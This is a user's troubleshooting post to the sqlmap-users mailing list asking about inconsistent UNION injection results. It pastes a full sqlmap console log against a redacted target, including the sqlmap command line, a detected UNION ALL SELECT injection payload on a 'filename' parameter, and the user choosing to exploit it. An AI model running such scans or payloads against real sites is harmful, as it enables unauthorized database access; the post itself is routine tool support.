Hi,
Below is the sqlmap command. Next time I ran it, it already says that the
parameter filename is not injectable. However, I always get an info that the
target URL is UNION injectable but the number of columns change every session.
I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3
and even the --time-sec=2 but I only get UNION injectable message but nothing
is vulnerable. What seems to be the problem here? Anybody can help me?
C:\Python27\sqlmap>python sqlmap.py -u
"xxxxxxx" --forms --b
atch --beep
sqlmap/1.0-dev (r4221) -
automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets
without prior mutual
consent is illegal. It is
the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are
not responsib
le for any misuse or damage caused by this program
[*] starting at 14:39:37
[14:39:37] [INFO] setting file for logging HTTP traffic
[14:39:37] [INFO] testing connection to the target url
[14:39:38] [INFO] searching for forms
[#1] form: [INFO]
GET xxxxxxxxx
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: xxxxxxxx
do you want to fill blank fields with random values? [Y/n] Y
[14:39:38] [INFO] using
'C:\Python27\sqlmap\output\xxxx\session' as sessi
on file
[14:39:38] [INFO] using
'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
as results file
[14:39:38] [INFO] testing if the url is stable, wait a few seconds
[14:39:39] [INFO] url is stable
[14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
[14:39:39] [WARNING] GET parameter 'productid' appears to be not
dynamic
[14:39:39] [WARNING] heuristic test shows that GET parameter
'productid' might n
ot be injectable
[14:39:39] [INFO] testing sql injection on GET parameter
'productid'
[14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:41] [INFO] testing 'Oracle AND time-based blind'
[14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:39:42] [WARNING] using unescaped version of the test because
of zero knowled
ge of the back-end DBMS. you can try to explicitly set it using
the --dbms optio
n
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:44] [INFO] testing if GET parameter 'name' is dynamic
[14:39:44] [WARNING] GET parameter 'name' appears to be not
dynamic
[14:39:44] [WARNING] heuristic test shows that GET parameter
'name' might not be
injectable
[14:39:44] [INFO] testing sql injection on GET parameter 'name'
[14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:46] [INFO] testing 'Oracle AND time-based blind'
[14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:47] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:39:50] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:51] [WARNING] GET parameter 'name' is not injectable
[14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
[14:39:52] [WARNING] GET parameter 'filename' appears to be not
dynamic
[14:39:52] [WARNING] heuristic test shows that GET parameter
'filename' might no
t be injectable
[14:39:52] [INFO] testing sql injection on GET parameter
'filename'
[14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:52] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:53] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:55] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't
recovered yet from
previous timed based payload.
if the problem persists please wait for few minut
es and rerun without flag T in --technique option (e.g.
--flush-session --techni
que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:56] [INFO] testing 'Oracle AND time-based blind'
[14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:57] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:40:00] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:01] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:03] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:04] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:05] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:07] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:08] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:09] [INFO] target url appears to be UNION injectable with
10 columns
[14:40:09] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:10] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:11] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:12] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:13] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [INFO] GET
parameter 'filename' is 'Generic UNION query (NULL) - 1 to
10 columns' injectable
GET parameter 'filename' is
vulnerable. Do you want to keep testing the others?
[y/N] N
sqlmap identified the following injection points with a total of
414 HTTP(s) req
uests:
---
Place: GET
Parameter: filename
Type: UNION query
Title: Generic UNION query (NULL) - 1 to 10
columns
Payload:
productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD
iekxuxW', NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL-- AND
'Aege'='Aege&cre
ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti
ve=on&comment=uPni
---
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy,
skipping to the
next form
[14:40:16] [INFO] you can find results of scanning in multiple
targets mode insi
de the CSV file
'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
[*] shutting down at 14:40:16
------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security
threats, fraudulent activity, and more. Splunk takes this data and makes
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users